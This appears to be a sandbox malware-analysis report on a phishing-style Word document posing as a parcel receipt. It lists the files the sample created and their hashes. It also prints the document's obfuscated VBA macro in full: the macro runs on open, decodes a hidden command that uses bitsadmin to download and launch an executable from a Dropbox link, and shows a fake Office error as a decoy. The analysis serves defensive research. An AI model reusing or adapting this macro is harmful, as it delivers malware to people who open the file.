Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | Files
Try VMRay Analyzer
File Information
Sample files count 1
Created files count 45
Modified files count 6
c:\users\aetadzjz\desktop\receipt-parcel-UK980-456.doc
-
File Properties
Names c:\users\aetadzjz\desktop\receipt-parcel-UK980-456.doc (Sample File)
Size 109.00 KB (111616 bytes)
Hash Values MD5: 1dfa6c28e296b4196f92c8b97e050754
SHA1: b8c701c3a0059820ee60111aa3cc6add2dbc33d0
SHA256: 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772
Actions
VBA Information
+
VBA Properties
Module Count 1
Macro Count 3
NewMacros.bas - Activate Workbook
+ 
Sub AutoOpen()
    Dim OGADJTPBNNVIKR As String
    Dim FMBVJVBB As String
    OGADJTPBNNVIKR = OGADJTPBNNVIKR & VRUOAIRHKHHTMF("fpg1h{h 2f %zdlw") & VRUOAIRHKHHTMF("iru 2w 8 \NHUT ) elw") & VRUOAIRHKHHTMF("vdgplq 2wudqvihu ") & VRUOAIRHKHHTMF("X") & VRUOAIRHKHHTMF("NHI ") & VRUOAIRHKHHTMF("2grzqord") & VRUOAIRHKHHTMF("g 2sulrulw| qrupdo kwwsv=22zz") & VRUOAIRHKHHTMF("z1gurser{1frp2v2:e<66")
    OGADJTPBNNVIKR = OGADJTPBNNVIKR & VRUOAIRHKHHTMF("5u9yplxk{o24") & VRUOAIRHKHHTMF("thv|r}dqdqul") & VRUOAIRHKHHTMF("yr{l") & VRUOAIRHKHHTMF("w|ri1h{hBgo@4 (dssgdwd(_lxr") & VRUOAIRHKHHTMF("ogz1h{h )vwduw (dssgdwd(_lxro") & VRUOAIRHKHHTMF("gz1h{h%")

    FMBVJVBB = FMBVJVBB & VRUOAIRHKHHTMF("Huuru 4<;:7= \rx p") & VRUOAIRHKHHTMF("xvw kdyh Riilfh Surihvvl") & VRUOAIRHKHHTMF("rqdo Hglwlrq wr uhdg") & VRUOAIRHKHHTMF(" wklv frq") & VRUOAIRHKHHTMF("whqw/ sohdvh x") & VRUOAIRHKHHTMF("sjudgh |rxu o") & VRUOAIRHKHHTMF("lfhqfh1 Ylvlw z") & VRUOAIRHKHHTMF("zz1plfurvriw1frp ir")
    FMBVJVBB = FMBVJVBB & VRUOAIRHKHHTMF("u kho") & VRUOAIRHKHHTMF("s")
    
    Shell OGADJTPBNNVIKR, vbHide
    MsgBox FMBVJVBB
End Sub
NewMacros.bas - Eventless
+ 
Private Function KDFNHXYJY(ByVal ZXUXMWSDNWUXFKZROLAKXAXFS As String, ByVal UIZLJHCZYXCKDO As Long) As String
    Dim NIFULPKBRS As Long
    NIFULPKBRS = Len(ZXUXMWSDNWUXFKZROLAKXAXFS)
    Dim KSTUELH As String
    Dim ELNWJPYGEKSJKWJXKKAAHOPC As Long
    Dim RZTNAMICZ As Long
    Dim WTBWUKRWBTLKFVPIDGVYKDKCX() As Long
    ReDim WTBWUKRWBTLKFVPIDGVYKDKCX(1 To NIFULPKBRS)
    For RZTNAMICZ = 1 To NIFULPKBRS
        ELNWJPYGEKSJKWJXKKAAHOPC = Asc(Mid(ZXUXMWSDNWUXFKZROLAKXAXFS, RZTNAMICZ, 1))
        If ELNWJPYGEKSJKWJXKKAAHOPC = 32 Then
            WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ) = ELNWJPYGEKSJKWJXKKAAHOPC
        Else:
            ELNWJPYGEKSJKWJXKKAAHOPC = ELNWJPYGEKSJKWJXKKAAHOPC - UIZLJHCZYXCKDO
            WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ) = ELNWJPYGEKSJKWJXKKAAHOPC
        End If
        KSTUELH = KSTUELH & Chr(WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ))
    Next
    KDFNHXYJY = KSTUELH
End Function
Private Function VRUOAIRHKHHTMF(IKJKBSKNJNPOGLRADOUVBMSFL As String)
  VRUOAIRHKHHTMF = KDFNHXYJY(IKJKBSKNJNPOGLRADOUVBMSFL, 3)
End Function
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin, ...
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe (Created File)
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat (Created File)
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp (Created File)
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt (Created File)
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe (Created File)
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\g[1].txt (Created File)
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ew[1].txt (Created File)
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\jw[1].txt (Created File)
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\0wqaga[1].txt (Created File)
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp (Created File)
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt (Created File)
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb092.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb0a3.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb0a4.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb0a5.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb0a6.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, ...
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe (Created File)
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe (Created File)
(Process Dump)
Size 192.00 KB (196608 bytes)
Hash Values MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca
SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x401068
Size Of Code 0x2e000
Size Of Initialized Data 0x4000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2018-01-10 23:01:33
Compiler/Packer Unknown
Sections (3)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2d8e4 0x2e000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 7.11
.data 0x42f000 0x296c 0x0 0x0 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 0.0
.rsrc 0x432000 0xd58 0x1000 0x2f000 CNT_INITIALIZED_DATA, MEM_READ 2.76
Imports (9)
+
MSVBVM60.DLL (9)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
MethCallEngine 0x0 0x401000 0x2e82c 0x2e82c
(by ordinal) 0x207 0x401004 0x2e830 0x2e830
EVENT_SINK_AddRef 0x0 0x401008 0x2e834 0x2e834
DllFunctionCall 0x0 0x40100c 0x2e838 0x2e838
EVENT_SINK_Release 0x0 0x401010 0x2e83c 0x2e83c
EVENT_SINK_QueryInterface 0x0 0x401014 0x2e840 0x2e840
__vbaExceptHandler 0x0 0x401018 0x2e844 0x2e844
(by ordinal) 0x2ad 0x40101c 0x2e848 0x2e848
(by ordinal) 0x64 0x401020 0x2e84c 0x2e84c
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat (Created File)
Size 0.20 KB (200 bytes)
Hash Values MD5: b1dd1aa15fb939d335f5c39a8ed85ab8
SHA1: 3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6
SHA256: 8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd
Actions
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp, ...
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab4336.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp (Created File)
Size 52.71 KB (53978 bytes)
Hash Values MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
Actions
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp, ...
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar4337.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp (Created File)
Size 126.77 KB (129813 bytes)
Hash Values MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.33 KB (342 bytes)
Hash Values MD5: cd4e3ab8068c33a6b3aec816fe51f106
SHA1: 71c4541a08b266e8e0ba9c0c7f91742e9b5a3511
SHA256: 8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: 9d4f7d11a38b13abfffb23c26855ef96
SHA1: a439414520213ebc9e009ef0280efbc4c442506c
SHA256: e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv (Created File)
Size 1.73 KB (1776 bytes)
Hash Values MD5: f3963866cf1b0a9cae95cf0ec6aae77e
SHA1: 946fa1fe444c25648522407a7c690ea43e0d3837
SHA256: b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt (Created File)
Size 3.15 KB (3224 bytes)
Hash Values MD5: aa11e7edd31a5aa3003171b3ce6a1e63
SHA1: 19f920fe20fb0368145fe224cbb6bc93c1c5db86
SHA256: c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig (Created File)
Size 0.70 KB (720 bytes)
Hash Values MD5: 084cd34da60abfe463f4bcdf6ff6c7c4
SHA1: 376783a4491e556cf55f5b6d3f5ef8edcb6d4faa
SHA256: ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: ee5b2511cdb5b31e4749e5955ca9a85a
SHA1: 315d35255f49ceb0f944a7b847a67ec7f9ef15b5
SHA256: 87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af
Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt (Created File)
Size 0.27 KB (281 bytes)
Hash Values MD5: 7372fbe29d49e31bd4002a12ff10b319
SHA1: b49450a4a7844b312769bd7ae0628aa1f0426efe
SHA256: 1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt (Created File)
Size 48.62 KB (49787 bytes)
Hash Values MD5: 5bce4a525f0d6dba211e09b60f144bf9
SHA1: 09f4d50cd2573e52623a19c40d987508d5c09bcb
SHA256: eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00
Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.33 KB (342 bytes)
Hash Values MD5: affe9cecdbfde660607fec2b5edaaa6f
SHA1: 4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e
SHA256: 08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt (Created File)
Size 0.23 KB (236 bytes)
Hash Values MD5: 41f4b78b882df2ab9fdf5c2c60cc7c85
SHA1: 75d27da1d973a5d0bc1f246834e5e22591ca2732
SHA256: 905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt (Created File)
Size 348.46 KB (356824 bytes)
Hash Values MD5: f7ae0d06a19a33310f2b33a9b91a0916
SHA1: c35f57e13fb999aeb678c8117af70714e5f38e9c
SHA256: 2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: ff63baf8441314e99b50f8e6205f2df8
SHA1: 1c5e1270872b75f9a1503ddc7bb22532257a8ed9
SHA256: 45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: ca0cc8ffcff1a13be2752132a8167d6b
SHA1: 3c0265be2ab965bf0ebf9382717bef9b815bec36
SHA256: 48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin, ...
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp (Created File)
Size 0.17 KB (171 bytes)
Hash Values MD5: 1142692290abc4073f6cb4f996e782fa
SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730
SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt (Created File)
Size 3.15 KB (3224 bytes)
Hash Values MD5: 5dee0de1d90631b1fb9a8de697045c67
SHA1: bb4d81d7b0352e350ac345ae367c58cd8049017a
SHA256: c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt (Created File)
Size 156.73 KB (160492 bytes)
Hash Values MD5: f0acdd87a868572d89fe58cc771a4f44
SHA1: e12103983b81e7c4e19c7e432ae0736a028024dd
SHA256: 308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt (Created File)
Size 200.17 KB (204972 bytes)
Hash Values MD5: 9cbb4d0e76c226eb847c4ef1a8b0d39c
SHA1: cff19e3d50f60e32157747873ba9e87cb1231de6
SHA256: f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt (Created File)
Size 167.56 KB (171584 bytes)
Hash Values MD5: e00b057f92a763e5b783ca24b94a26ce
SHA1: c3b90637188b48431e1aea880a49393e669a300c
SHA256: 998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f
Actions
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat (Created File)
Size 0.21 KB (216 bytes)
Hash Values MD5: 98de219891ef24cceaa12d1c41436654
SHA1: 7ad5ad583dfd70ed21dd2acef592c931def67f0a
SHA256: 14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88
Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt (Created File)
Size 0.27 KB (279 bytes)
Hash Values MD5: 90de1992ceb330537fee8db14d5fd987
SHA1: b05f7371ddbfc73d7393445bd8d52048289f0a4f
SHA256: 6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231
Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt (Created File)
Size 0.27 KB (278 bytes)
Hash Values MD5: 7e2935c87edf38621c63511a6cc5e1e3
SHA1: 148686c9adafa08e6d55351479da7be5b0bcf064
SHA256: d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt (Created File)
Size 48.62 KB (49791 bytes)
Hash Values MD5: 9b930032eac8c180ed70390aee88903c
SHA1: 843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f
SHA256: 888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 23e04d8ef7cca29b1eeff7fa22c0c8e0
SHA1: 6af5fc031b6f31cef4e14b7056ea07441a79fbe9
SHA256: 73794646c8afa7e919476ff8095e4f5f2dd0caa3dfb7badc8620eb36b81c6307
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 948a64299b0f13ef15d1534c929c8908
SHA1: 707d2546cb7e3d6ef30084fa817b068ba299b48d
SHA256: a84e628a54c5000e94bf8026a5ccdd062d100a5c9f22827548b8eab8d745503c
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 082e064c3b994a31dc76874b48a6033d
SHA1: 5df5d513919f2c5373e46f4274c0ca043ec2d074
SHA256: 9a22b3e989be91a1ea151037471a153ef989117bb1215488e7e7c62f78c3424d
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 80fa0fcd69c77d3f984d712e6741c5b6
SHA1: a4a473c7457f6ef5ac8b037096151ee812c0547d
SHA256: c8f0e774f0ee04169b6dcb3c97df5b1c99325406fddd9afbe2039bbe0eebe74a
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 309cd930b3d4df7998a5aeb8f61ab194
SHA1: 9fe5095d059406cd2f92d58b9ac148cd5897450c
SHA256: fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt (Created File)
Size 0.09 KB (88 bytes)
Hash Values MD5: 105ef3c8c5656d44bb9c7221446103cc
SHA1: 0a1aa89639d01e9ab3a76b0bc22911ec5033bc17
SHA256: bc9e231394912761cdff92d2ba0ccfe6ed8427198c17eb3e65b23e62d8c8d962
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 6928ee150e77b6e370de79ff6ba859e2
SHA1: e200706435642973086f3659903ddcabf59d894f
SHA256: f0e4ff028c7f7c9a09ea8b29458ef9269108598cbdba2a50f384e6af67819c96
Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat (Modified File)
Size 256.00 KB (262144 bytes)
Hash Values MD5: 8ed682d01fa076cced515bf6b21ba022
SHA1: e69667b35d101d9cd052697da198c40a88e16e74
SHA256: 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c
Actions
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\coob07b.tmp (Created File)
Size 12.41 KB (12707 bytes)
Hash Values MD5: 60492a553dc3492eaea00299b9976477
SHA1: 296392a97cf91096c931293099654ac50dae95f3
SHA256: 8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 16.74 KB (17146 bytes)
Hash Values MD5: 18c3f549ae3ef0029f410aa06ca2ad50
SHA1: 2b599a6397db74b8e074dd3a38eb0d2aad8b3be9
SHA256: 4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53
Actions
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp (Created File)
Size 0.20 KB (207 bytes)
Hash Values MD5: c8c975ff6c535bb9e0d34a332b334e8f
SHA1: 5bcbf5c63be57bb1512270a904424352081ab0ba
SHA256: 863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe
Actions
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp, ...
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp (Created File)
Size 0.07 KB (68 bytes)
Hash Values MD5: 7f420b843841e2e85c7a9c66d0d02fa4
SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69
SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c
Actions
